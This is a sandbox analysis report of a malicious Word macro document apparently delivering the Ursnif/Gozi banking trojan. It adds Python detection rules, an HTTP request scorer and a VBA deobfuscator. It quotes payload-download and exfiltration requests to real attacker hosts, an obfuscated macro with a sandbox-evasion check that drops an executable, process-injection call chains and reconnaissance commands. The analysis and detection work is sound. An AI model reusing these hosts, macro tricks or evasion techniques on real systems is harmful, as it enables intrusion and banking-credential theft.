
Analysis Report e41ZuYVo64.docm

Overview

General Information

Joe Sandbox Version: 26.0.0
Analysis ID: 820806
Start date: 20.03.2019
Start time: 16:36:30
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 6m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: e41ZuYVo64.docm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 81
  • Number of non-executed functions: 228
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .docm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 100   | 0 - 100 | Report FP / FN | false       | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      | 5 of 5


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; additional UI automation would likely extend the observed behavior.
Some HTTP requests failed (404), so the sample likely exhibited less behavior than it would have with all of its servers responding.



Mitre Att&ck Matrix

Techniques followed by digits are the ones that fired in this analysis; the digits are the report's per-technique signature-count badges, reproduced as extracted.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts 1 | Scripting 32 | Hooking 1 | Hooking 1 | Rootkit 2 | Hooking 1 | Process Discovery 3 | Application Deployment Software | Email Collection 1 | Data Compressed | Standard Cryptographic Protocol 1
Replication Through Removable Media | Exploitation for Client Execution 23 | Valid Accounts 1 | Valid Accounts 1 | Masquerading 1 | Credentials in Files 1 | Security Software Discovery 431 | Remote Services | Man in the Browser 1 | Exfiltration Over Other Network Medium | Standard Non-Application Layer Protocol 4
Drive-by Compromise | Windows Management Instrumentation | Registry Run Keys / Startup Folder 1 | Process Injection 811 | Valid Accounts 1 | Input Capture | Remote System Discovery 1 | Windows Remote Management | Data from Local System 1 | Automated Exfiltration | Standard Application Layer Protocol 114
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Process Injection 811 | Credentials in Files | System Network Configuration Discovery 2 | Logon Scripts | Input Capture | Data Encrypted | Connection Proxy 1
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Scripting 32 | Account Manipulation | System Information Discovery 215 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Obfuscated Files or Information 1 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port

Signature Overview



Spreading:

Performs a network lookup / discovery via net view
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: text.doc.16147.scr.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Users\user\text.doc.16147.scr
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: interruption.ru
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80

The "document exploit" signature names are generic: in this sample the drop and launch of text.doc.16147.scr are performed by the Document_Open VBA macro quoted under System Summary, not by a parser exploit.

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.1.83:49206 -> 37.152.176.90:80
Source: Traffic | Snort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.1.83:49207 -> 46.139.176.151:80
Found Tor onion address
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | String found in binary or memory: .onion/
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrLastTaskLastConfigCrHookOpHookExec.onion/TorClientTorCrc%s %s HTTP/1.1
May check the online IP address of the machine
Source: unknown | DNS query: name: myip.opendns.com (the same query is logged twice)
Uses nslookup.exe to query domains
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
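The process-creation lines in this report (cmd.exe running net view, the nslookup of myip.opendns.com via resolver1.opendns.com, and WINWORD.EXE starting text.doc.16147.scr under Software Vulnerabilities) are the parent/child pairs a detection engineer turns into rules. The Python below is an added example, not part of the Joe Sandbox report and not any vendor's tooling: three small rules evaluated over process-creation events transcribed from the report. The ProcEvent field names are my own choice, not a Sysmon or EDR schema, and the benign notepad event is a constructed control.

```python
"""Triage rules for the process tree seen in this report (added example)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the parent ("unknown" when the sandbox did not resolve it)
    image: str    # image path of the created process
    cmdline: str  # full command line


OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
EXEC_EXTS = (".exe", ".scr", ".com", ".pif")


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_user_executable(ev: ProcEvent) -> bool:
    """Office parent starting an executable from under C:\\Users (the .scr drop in this report)."""
    return (_base(ev.parent) in OFFICE_IMAGES
            and _base(ev.image).endswith(EXEC_EXTS)
            and ev.image.lower().startswith("c:\\users\\"))


def external_ip_lookup(ev: ProcEvent) -> bool:
    """nslookup myip.opendns.com: a 'what is my public IP' lookup that legitimate software rarely makes."""
    return _base(ev.image) == "nslookup.exe" and "myip.opendns.com" in ev.cmdline.lower()


def share_enumeration(ev: ProcEvent) -> bool:
    """net view with no target enumerates hosts and shares in the local browse list."""
    return (_base(ev.image) == "net.exe"
            and re.search(r"\bnet(?:1)?\s+view\b", ev.cmdline.lower()) is not None)


RULES = {
    "office_spawns_user_executable": office_spawns_user_executable,
    "external_ip_lookup": external_ip_lookup,
    "share_enumeration": share_enumeration,
}


def triage(events):
    """Return {rule_name: [cmdline, ...]} for every rule that fired on at least one event."""
    hits = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.cmdline)
    return hits


# Transcribed from the report's "Process created" lines; the last event is a constructed benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r"C:\Users\user\text.doc.16147.scr", r"C:\Users\user\text.doc.16147.scr"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe", "net view"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe",
              "nslookup myip.opendns.com resolver1.opendns.com"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe", "nslookup 127.0.0.1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for rule, cmds in triage(SAMPLE_EVENTS).items():
        print(rule, "->", cmds)
```

The nslookup 127.0.0.1 event deliberately does not fire: on its own it is noise, and only the combination with the myip.opendns.com lookup from the same cmd.exe parent is worth an alert.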
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 31.148.219.163 (the same observation is logged 50 times in the report; the host is addressed directly by IP, which matches the bare-IP Host header of the /images/logo2.png request below)
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
  GET /free/t32.bin HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: interruption.ru
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  GET /images/logo2.png HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 31.148.219.163
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  Host: profitsproject.ru
Source: global traffic | HTTP traffic detected:
  POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=382116919742642393088
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  Content-Length: 401
  Host: profitsproject.ru
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /images/logo2.png HTTP/1.1 (same request and headers as above; Host: 31.148.219.163)
Source: global traffic | HTTP traffic detected: GET /free/t32.bin HTTP/1.1 (same request and headers as above; Host: interruption.ru)
Source: global traffic | HTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/.../Mu1_2B.gif HTTP/1.1 (same request and headers as above; Host: profitsproject.ru)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: interruption.ru
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /images/tGVH9_2Ftdk/.../qd.bmp HTTP/1.1 (same request and headers as above; multipart/form-data, Content-Length: 401, Host: profitsproject.ru)
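The four requests above carry the features that distinguish this traffic from browsing: the payload download from interruption.ru has no User-Agent at all, the logo2.png request addresses its server by bare IP, and the profitsproject.ru GET and POST use long /images/ paths made of base64-looking segments with the "_2B" and "_2F" escapes, ending in a fake .gif or .bmp name, the POST being a multipart upload. The Python below is an added example, not part of the Joe Sandbox report: a small scorer that parses flattened requests and reports which of those features each one trips. The requests are transcribed from the report with headers separated by newlines; the path heuristic is based only on what is visible in these URLs and is not Ursnif's actual encoding scheme, so treat it as a triage hint rather than a decoder, and expect CDN image URLs to occasionally match it.

```python
"""Score captured HTTP requests on the features seen in this report (added example)."""
import re

# Base64 alphabet once '+' and '/' have been rewritten as _2B and _2F, as in the report's URLs.
_B64_SEG = re.compile(r"^[A-Za-z0-9_]+$")
_IMAGE_EXTS = {"gif", "bmp", "png", "jpg", "jpeg"}


def parse_request(raw: str):
    """Split a request (request line, then 'Name: value' header lines) into (method, target, headers)."""
    lines = raw.strip().split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def gozi_style_path(target: str) -> bool:
    """Long /images/... path of base64-looking segments, a fake image extension, and _2B/_2F escapes."""
    path = target.split("?", 1)[0]
    segs = [s for s in path.split("/") if s]
    if len(segs) < 5 or segs[0] != "images":
        return False
    stem, _, ext = segs[-1].rpartition(".")
    if ext.lower() not in _IMAGE_EXTS:
        return False
    if not all(_B64_SEG.match(s) for s in segs[1:-1] + [stem]):
        return False
    return "_2B" in path or "_2F" in path


def score_request(raw: str):
    """Return (score, reasons) for one request; each reason is one feature that matched."""
    method, target, headers = parse_request(raw)
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", "")):
        reasons.append("Host is a bare IP address")
    if gozi_style_path(target):
        reasons.append("Gozi/Ursnif-style encoded path")
    if method == "POST" and headers.get("content-type", "").startswith("multipart/form-data"):
        reasons.append("multipart POST (possible exfil)")
    if target.lower().endswith(".bin"):
        reasons.append("downloads a .bin payload")
    return len(reasons), reasons


# Transcribed from the report's 'HTTP traffic detected' lines (headers newline-separated).
REQUESTS = {
    "t32": "GET /free/t32.bin HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\n"
           "Pragma: no-cache\nHost: interruption.ru",
    "logo": "GET /images/logo2.png HTTP/1.1\nAccept: */*\nAccept-Language: en-us\n"
            "Accept-Encoding: gzip, deflate\n"
            "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; "
            ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
            ".NET4.0C; .NET4.0E)\nHost: 31.148.219.163\nConnection: Keep-Alive",
    "beacon": "GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/"
              "JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/"
              "RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1\n"
              "Cache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\n"
              "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\nHost: profitsproject.ru",
    "exfil": "POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/"
             "cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/"
             "5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1\n"
             "Cache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\n"
             "Content-Type: multipart/form-data; boundary=382116919742642393088\n"
             "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\n"
             "Content-Length: 401\nHost: profitsproject.ru",
}


def triage_all():
    """Score every transcribed request."""
    return {name: score_request(raw) for name, raw in REQUESTS.items()}


if __name__ == "__main__":
    for name, (score, reasons) in triage_all().items():
        print(f"{name}: {score} {reasons}")
```

The logo2.png request looks like a browser fetch apart from its Host header, which is why the bare-IP check is kept as a separate, low-weight feature instead of being folded into the path heuristic.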
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.10.2
  Date: Wed, 20 Mar 2019 16:38:45 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 1573
  Connection: close
  Referrer-Policy: no-referrer
  Data Raw (the report gives this as a hex dump, decoded here as ASCII; the dump is truncated in the report):
    <!DOCTYPE html>
    <html lang=en>
      <meta charset=utf-8>
      <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
      <title>Error 404 (Not Found)!!1</title>
      <style>
        *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background
Urls found in memory or binary data
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmp | String found in binary or memory: http://interruption.ru/free/t32.bin
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmp | String found in binary or memory: http://interruption.ru/free/t64.bin
Source: explorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmp | String found in binary or memory: http://www.%s.comPA

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00371C56 lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00371C56 lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing, and then click Enable Content. " You are attempting to open a file that was created
Source: Document image extraction number: 0 | Screenshot OCR: enable content to see this document. " If the file opens in Protected VIew, click Enable Editing, a
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing and then click Enable Content ' You are attempting to open a hie that was created in
Source: Document image extraction number: 1 | Screenshot OCR: enable content to see this document " If the file opens in Protected view, click Enable Editing and
Document contains an embedded VBA macro with suspicious strings
Source: e41ZuYVo64.docm | OLE, VBA macro line: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476
Source: e41ZuYVo64.docm | OLE, VBA macro line: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then | Name: Document_Open
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr" | Name: Document_Open
Document contains an embedded VBA with functions possibly related to HTTP operations
Source: e41ZuYVo64.docm | Stream path 'VBA/JtuJu': found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation | OLE, VBA macro: Module JtuJu, Function I8BD2, found possibly 'XMLHttpRequest' functions response, responsebody, open, send | Name: I8BD2
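The two macro lines quoted above show the obfuscation the sandbox had to see through: the environment-variable name is split into string fragments interleaved with variables (the literal fragments alone already spell NUMBER_OF_PROCESSORS, and the macro branches away with GoTo B0476 when that count is below 2, a single-core sandbox check), and the drop path is assembled from Environ("USERPROFILE") plus "\text.doc", "." and "16147.scr". The Python below is an added example, not part of the Joe Sandbox report and not olevba code: a small parser that collapses such concatenation expressions. It treats the interleaved identifiers (O84BAz6, J41vmf7, and so on) as empty strings because the report does not show their values; that is an assumption, and real values recovered from the macro can be passed in through the variables argument. CStr() is treated as transparent and Environ("X") is rendered as %X%, both my own rendering choices.

```python
"""Collapse VBA string-concatenation obfuscation (added example)."""
import re

# groups: 1 string literal, 2 identifier, 3 concat operator, 4 parenthesis, 5 anything unexpected
_TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_][A-Za-z0-9_]*)|([+&])|([()])|\s+|(\S)')


def tokenize(src):
    """Turn a VBA concatenation expression into (kind, value) tokens."""
    tokens = []
    for m in _TOKEN.finditer(src):
        if m.group(1) is not None:
            tokens.append(("STR", m.group(1).replace('""', '"')))  # "" inside a literal is an escaped quote
        elif m.group(2):
            tokens.append(("IDENT", m.group(2)))
        elif m.group(3):
            tokens.append(("OP", m.group(3)))
        elif m.group(4):
            tokens.append(("PAREN", m.group(4)))
        elif m.group(5):
            raise ValueError(f"unexpected character {m.group(5)!r}")
    return tokens


class _Parser:
    """expr := term (('+' | '&') term)* ; term := STR | IDENT | IDENT '(' expr ')' | '(' expr ')'"""

    def __init__(self, tokens, variables):
        self.toks, self.pos, self.vars = tokens, 0, variables

    def _peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else (None, None)

    def _take(self):
        tok = self._peek()
        self.pos += 1
        return tok

    def _expect(self, paren):
        if self._take() != ("PAREN", paren):
            raise ValueError(f"expected {paren!r}")

    def expr(self):
        out = self.term()
        while self._peek() in (("OP", "+"), ("OP", "&")):
            self._take()
            out += self.term()
        return out

    def term(self):
        kind, val = self._take()
        if kind == "STR":
            return val
        if (kind, val) == ("PAREN", "("):
            inner = self.expr()
            self._expect(")")
            return inner
        if kind == "IDENT":
            if self._peek() == ("PAREN", "("):  # function call: Environ(...), CStr(...)
                self._take()
                arg = self.expr()
                self._expect(")")
                return f"%{arg}%" if val.lower() == "environ" else arg  # CStr() etc. are transparent
            return self.vars.get(val, "")  # plain variable; unknown -> "" (assumption, see lead-in)
        raise ValueError(f"unexpected token {kind} {val!r}")


def collapse(src, variables=None):
    """Return the string a VBA concatenation expression evaluates to."""
    p = _Parser(tokenize(src), variables or {})
    result = p.expr()
    if p.pos != len(p.toks):
        raise ValueError("trailing tokens in expression")
    return result


def environ_lookups(line, variables=None):
    """Collapse the argument of every Environ(...) call on one VBA line."""
    names = []
    for m in re.finditer(r"\bEnviron\s*\(", line):
        depth, i, in_str = 1, m.end(), False
        while i < len(line) and depth:  # find the matching ')' while ignoring parens inside literals
            c = line[i]
            if c == '"':
                in_str = not in_str
            elif not in_str and c == "(":
                depth += 1
            elif not in_str and c == ")":
                depth -= 1
            i += 1
        names.append(collapse(line[m.end():i - 1], variables))
    return names


# The two macro lines quoted in the report.
VBA_IF_LINE = ('If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" '
               '+ KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476')
VBA_PATH_EXPR = r'CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"'

if __name__ == "__main__":
    print(environ_lookups(VBA_IF_LINE))  # ['NUMBER_OF_PROCESSORS']
    print(collapse(VBA_PATH_EXPR))       # %USERPROFILE%\text.doc.16147.scr
```

If the interleaved variables turn out to hold junk rather than empty strings, the collapsed name will not be a valid environment variable and Environ() would return an empty string, which compares as less than 2 and takes the bail-out branch; the variables argument lets you check that case against the recovered values.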
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Writes or reads registry keys via WMI
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\System32\driverquery.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Contains functionality to call native functions
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01412A7B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_0141271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413C1B NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01411C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413D34 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_014126DC NtMapViewOfSection,RtlNtStatusToDosError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413CF3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413789 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413CB2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413B27 memset,NtQueryInformationProcess
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413D84 NtGetContextThread,NtGetContextThread
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038A02C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038885B NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003890AF memset,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038F8C5 GetVersion,NtCreateWaitablePort,NtCreateDirectoryObject,GetLastError
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037C3A5 NtLoadKeyEx,memcpy
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00386B82 NtCreateWaitablePort,memset,FlushFileBuffers,GetLastError
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038940B NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00390D1B memset,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,LocalFree,NtCancelIoFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038DE89 NtMapViewOfSection,RtlNtStatusToDosError
